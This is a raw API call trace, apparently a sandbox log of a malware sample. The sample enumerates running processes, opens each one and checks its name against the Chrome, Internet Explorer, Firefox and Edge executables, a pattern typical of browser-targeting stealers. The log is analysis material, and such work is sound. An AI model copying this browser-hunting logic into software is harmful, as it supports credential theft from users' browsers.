	[0195.497] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.498] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xf20
	[0195.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.498] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.498] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.499] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.499] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.499] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xf24
	[0195.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.500] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.500] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.501] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.501] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.501] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0195.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xf28
	[0195.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.502] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0195.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.502] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.503] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0195.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.503] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.503] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xf2c
	[0195.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.504] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.504] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.504] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.505] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.505] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0195.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xf30
	[0195.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.506] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.506] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.506] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.507] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0195.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xf34
	[0195.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.508] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0195.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.508] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.508] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0195.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.508] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xf38
	[0195.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.509] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.510] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.510] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.510] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.511] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0195.511] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xf3c
	[0195.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.511] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0195.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.512] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.512] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0195.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.512] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0195.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xf40
	[0195.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.513] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0195.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.514] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.514] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0195.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.514] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.514] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0195.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xf44
	[0195.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.515] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0195.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.532] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.532] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0195.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.532] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.532] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0195.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xf48
	[0195.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.533] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0195.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.534] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.534] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0195.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.534] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0195.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0195.535] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0195.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xf4c
	[0195.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.536] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0195.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.537] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.537] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0195.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.538] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.538] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0195.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xf50
	[0195.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.539] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0195.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.539] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.540] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0195.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.540] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0195.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xf54
	[0195.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.541] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0195.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.541] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.542] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0195.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.542] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.542] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0195.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xf58
	[0195.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.543] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0195.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.543] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.544] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0195.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.544] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.544] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0195.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xf5c
	[0195.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.545] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0195.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.545] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.546] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0195.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.548] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.548] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0195.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xf60
	[0195.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.549] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0195.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.550] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.550] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0195.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.550] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.550] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0195.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xf64
	[0195.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.551] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0195.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.552] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.552] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0195.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.552] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.553] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0195.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xf68
	[0195.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.554] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0195.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.554] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.554] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0195.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.555] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.555] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0195.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xf6c
	[0195.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.556] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0195.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.556] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.557] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0195.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.557] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.557] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0195.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xf70
	[0195.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.558] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0195.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.558] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.558] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0195.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.559] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.559] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0195.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xf74
	[0195.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.559] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0195.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.560] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.560] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0195.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.561] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0195.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xf78
	[0195.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.562] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0195.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.563] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.563] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0195.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.564] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.564] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0195.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xf7c
	[0195.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.565] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0195.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.566] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.566] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0195.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.566] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.567] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0195.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xf80
	[0195.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
